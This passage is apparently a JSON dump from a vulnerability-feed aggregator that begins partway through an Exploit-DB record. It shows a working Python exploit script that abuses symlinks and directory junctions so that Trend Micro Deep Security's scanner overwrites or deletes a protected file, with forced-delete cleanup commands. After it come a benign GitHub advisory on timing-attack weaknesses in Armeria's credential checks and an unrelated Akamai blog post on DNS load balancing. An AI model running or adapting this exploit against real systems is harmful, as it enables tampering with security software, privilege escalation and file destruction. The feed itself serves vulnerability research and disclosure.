browser (preferrably IE) and start the script\r\n# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).\r\n# 4. Keep refreshing the page until you see the script create the target file overwritten.\r\n#\r\n# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. \r\n\r\n\r\nimport time\r\nimport os\r\nimport subprocess\r\nimport sys\r\nimport webbrowser\r\nfrom watchdog.observers import Observer\r\nfrom watchdog.events import FileSystemEventHandler\r\n\r\nclass Stage1_Handler(FileSystemEventHandler):\r\n\tdef __init__(self):\r\n\t\tself.filenames = []\r\n\tdef on_created(self, event):\r\n\t\tfilename = os.path.basename(event.src_path)\r\n\t\tif filename in self.filenames:\r\n\t\t\tprint ('Starting symlink creation.')\r\n\t\t\twatcher1.stop()\r\n\t\t\tsymlinkery(self.filenames)\r\n\t\telse:\r\n\t\t\tself.filenames.append(filename)\r\n\t\t\tprint ('File %s created.') % filename\r\n\t\t\t\r\nclass Stage2_Handler(FileSystemEventHandler):\r\n\tdef on_any_event(self, event):\r\n\t\tif os.path.basename(event.src_path) == 'dsa_control.cmd':\r\n\t\t\tprint \"Target file overwritten/deleted. Cleaning up.\"\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM CreateSymlink.exe\", shell=True)\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM Baitandswitch.exe\", shell=True)\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\\"')\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\test\"')\r\n\t\t\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp')\r\n\t\t\twatcher2.stop()\r\n\t\t\tsys.exit(0)\r\n\t\t\t\r\nclass Watcher(object):\r\n\tdef __init__(self, event_handler, path_to_watch):\r\n\t\tself.event_handler = event_handler\r\n\t\tself.path_to_watch = path_to_watch\r\n\t\tself.observer = Observer()\r\n\tdef run(self):\r\n\t\tself.observer.schedule(self.event_handler(), self.path_to_watch)\r\n\t\tself.observer.start()\r\n\t\ttry:\r\n\t\t\twhile True:\r\n\t\t\t\ttime.sleep(1)\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\tself.observer.stop()\r\n\r\n\t\tself.observer.join()\r\n\tdef stop(self):\r\n\t\tself.observer.stop()\r\n\t\t\r\ndef symlinkery(filenames):\r\n\tprint \"Enter symlinkery\"\r\n\tfor filename in filenames:\r\n\t\tprint \"Creating symlink for %s\" % filename\r\n\t\tcmdname = \"start cmd /c CreateSymlink.exe \\\"C:\\\\test\\\\virus\\\\%s\\\" \\\"C:\\\\test\\\\test\\\\symtarget\\\"\" % filename\r\n\t\tsubprocess.Popen(cmdname, shell=True)\r\n\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig')\r\n\tos.system('mklink /J \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\" C:\\\\test')\r\n\twatcher2.run()\r\n\tprint \"Watcher 2 started\"\r\n\r\ntry:\r\n os.mkdir('C:\\\\test')\r\nexcept:\r\n pass\r\n\r\npath1 = 'C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\virus'\r\npath2 = 'C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\'\r\nwatcher1 = Watcher(Stage1_Handler,path1)\r\nwatcher2 = Watcher(Stage2_Handler,path2)\r\nswitcheroo = \"start cmd /c BaitAndSwitch.exe C:\\\\test\\\\test\\\\symtarget \\\"C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\dsa_control.cmd\\\" \\\"C:\\\\windows\\\\temp\\\\deleteme.txt\\\" d\"\r\nsubprocess.Popen(switcheroo, shell=True)\r\nwatcher1.run()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47751"}], "github": [{"lastseen": "2019-12-06T22:27:42", "bulletinFamily": "software", "description": "## Multiple timing attack vulnerabilities leading to the recovery of secrets based on the use of non-constant time compare function\r\n\r\n### Impact\r\n\r\nString comparison method in multiple authentication validation in Armeria were known to be vulnerable to timing attacks. This vulnerability is caused by the insecure implementation of `equals` method from `java.lang.String`. While this attack is not practically possible, an attacker still has a potential to attack if the victim's server validates user by using `equals` method.\r\n\r\nWe would like to thank @chrsow for pointing out the issue.\r\n\r\n## Potentially vulnerable codes\r\n\r\nhttps://github.com/line/armeria/blob/f0d870fde1088114070be31b67f7df0a21e835c6/core/src/main/java/com/linecorp/armeria/server/auth/OAuth2Token.java#L54\r\nhttps://github.com/line/armeria/blob/f0d870fde1088114070be31b67f7df0a21e835c6/core/src/main/java/com/linecorp/armeria/server/auth/BasicToken.java#L64\r\n\r\n### Patches\r\n\r\nThere are two options to patch this issue.\r\n\r\n1. Remove `equals` method; it has been exclusively used for test cases and was never used in any OSS projects that are using Armeria. (But it is worth noting that there are possibilities of closed projects authenticating users by utilizing `equals` method)\r\n\r\n2. Use `MessageDigest.isEqual` to compare the credential instead.\r\n\r\n### Workarounds\r\n\r\n1. Update to the latest version (TBD)\r\n\r\n2-1. Users can prevent these vulnerabilities by modifying and implementing timing attack preventions by themselves.\r\n\r\n2-2. Precisely speaking, it is possible to compare credentials by securely comparing them after calling methods to directly return the input (namely `Object. accessToken()`, `Object.username()` and `Object.password()`).\r\n\r\n### References\r\n- https://cwe.mitre.org/data/definitions/208.html\r\n- https://security.stackexchange.com/questions/111040/should-i-worry-about-remote-timing-attacks-on-string-comparison\r\n\r\n### Side Note\r\n\r\nSince it is a theoretical attack, there is no PoC available from neither the vendor nor the security team.\r\n\r\n", "modified": "2019-12-06T18:54:03", "published": "2019-12-05T18:40:51", "id": "GHSA-24R8-FM9R-CPJ2", "href": "https://github.com/advisories/GHSA-24r8-fm9r-cpj2", "title": "Low severity vulnerability that affects com.linecorp.armeria:armeria", "type": "github", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2019-12-05T18:27:15", "bulletinFamily": "blog", "description": "### What is GTM\n\nGlobal Traffic Management, or GTM, is a DNS-based load balancing service that offers application owners a level of flexibility and insight that is unmatched by traditional on-prem solutions. Highly scalable and fault-resilient, GTM offers customers a layer of abstraction between endpoints, so traffic can be easily shifted between targets. However, the platform is not limited to weighted load distribution: GTM can execute intelligent routing decisions based on end-user location, network conditions, and even origin server availability. These features are possible thanks to Akamai's unrivaled visibility into the Internet, which fuels the platform's dynamic, data-based route optimization engine.\n\n### Front-End GTM\n\nDNS level load balancing affords domain owners the opportunity to potentially regulate traffic splits _before any HTTP layer requests are even sent_. Traditionally classified as \"front-end\" GTM, a property can be configured to control the destination of the initial incoming client request (first circle pictured below):\n\n\n\nWhile GTM traditionally balances traffic between origin data centers in the _second_ _leg_, Front-End GTM can assist with a number of important use cases as well.\n\n### Deployments Made Easier\n\nOne primary example--let's say you are onboarding a hostname onto Akamai's CDN for the first time to procure much-needed performance and security improvements. Without front-end GTM in place, the go-live step will entail updating the applicable hostname's DNS record, and pointing the entry to the new CDN hostname (which will resolve to an Akamai server IP). This deployment method requires transitioning _all_ traffic over to the Akamai configuration at once, however, and rollback may prove cumbersome. If the DNS record points to a GTM property instead, domain owners have the option of easing traffic over to the new Akamai CDN hostname in increments. Simply put, domain owners can 'Akamaize' as much or as little traffic as they see fit during the initial deployment (and increase the ratio over time). In addition, rollback is considerably easier, as shifting 100% of traffic back to the legacy architecture is as simple as a few clicks in the portal. If a more programmatic switch is preferred, GTM offers an API to manage traffic splits, and liveness tests can facilitate automatic failover if errors are detected.\n\n\n\nAnother great use case is deploying a new Akamai certificate. Let's say your security team wants to transition a hostname to another certificate -- or perhaps an important cipher upgrade / TLS version change is required. While these are typically harmless deployments, GTM provides the option to introduce these changes with a phased approach. The application owner simply needs to establish a new Akamai CDN hostname and associate it with the new certificate. From there, GTM can balance traffic between the old and new certificate settings in the desired manner.\n\n\n\n### Conclusion\n\nWithout GTM, these enhancements are 'all-or-nothing' deployments and rollback can prove tedious. However, GTM allows these changes to be deployed and retracted seamlessly, granting application owners a comforting level of flexibility and control.\n\nFront-End GTM has many other use cases as well (sending traffic to different endpoints based on geolocation, blocking users based on location, etc.) but phasing in DNS level changes is an often-overlooked benefit. If you have any questions about how front-end (or back-end) GTM can assist with your load balancing needs, please reach out to your Akamai technical representatives or checkout the resources below.\n\n### Explore Akamai's Diverse DNS Oriented Solutions\n\nIf you find this blog useful, continue your exploration with these references. Everything Akamai deploys depends on our Intelligent Edge DNS platform. Akamai expands our platform to enable a range of services for our customers:\n\n * Achieve domain stability and resilience with Akamai's [Fast DNS service](<https://www.akamai.com/us/en/products/security/fast-dns.jsp>). The White Paper - [**Designing DNS for Availability and Resilience against DDoS Attacks**](<https://content.akamai.com/gl-en-pg9295-fast-dns-wp-designing-dns-for-availability.html>)** explains how Akamai deploys Fast DNS with multiple vectors of global resilience. **\n * Load balance your data centers, cloud deployments, and CDNs with Akamai's Cloud-Based[ Global Server Load Balancing (GSLB) solution - GTM](<https://www.akamai.com/uk/en/products/performance/global-traffic-management.jsp>).\n * Massively scale your application with layer 7 load balancing with Akamai's [Application Load Balancer (ALB) Cloudlet](<https://www.akamai.com/us/en/products/performance/cloudlets/application-load-balancer.jsp>).\n * Ensure every device in your network checks a DNS security tool - ensuring the domain name resolved DOES NOT result in exposure to malware, phishing, or a botnet. Akamai's [Enterprise Threat Protecto](<https://www.akamai.com/us/en/products/security/enterprise-threat-protector.jsp>)r (ETP) and [DNSi/SPS solutions](<https://www.akamai.com/us/en/products/network-operator/dnsi-cacheserve.jsp>) turn your DNS resolver into a security tool.\n * [Sign-up and Search Akamai's Community](<https://community.akamai.com/customers/s/?language=en_US>). This provides you access to a range of Akamai resources.\n * [DevOps Professionals](<https://developer.akamai.com/>) are welcomed to join [developers.akamai.com](<https://developer.akamai.com/>). Akamai's DNS solutions are API and DevOps aligned ... enabling cloud to cloud innovation.\n\n[Use this form to ask for Akamai's help.](<https://www.akamai.com/uk/en/contact-us/>) We can have someone contact you to help with your DNS questions.\n\n", "modified": "2019-12-05T17:08:12", "published": "2019-12-05T17:00:00", "id": "AKAMAIBLOG:F7D2247A0218B794BB6BD2726CE9083D", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/En1sn9zlMcg/managing-traffic-from-the-outset---how-gtm-can-make-your-deployments-easier.html", "type": "akamaiblog", "title": "Managing Traffic From the Outset - How GTM Can Make Your Deployments Easier", "cvss": {"score": 0.0, "vector": "NONE"}}]}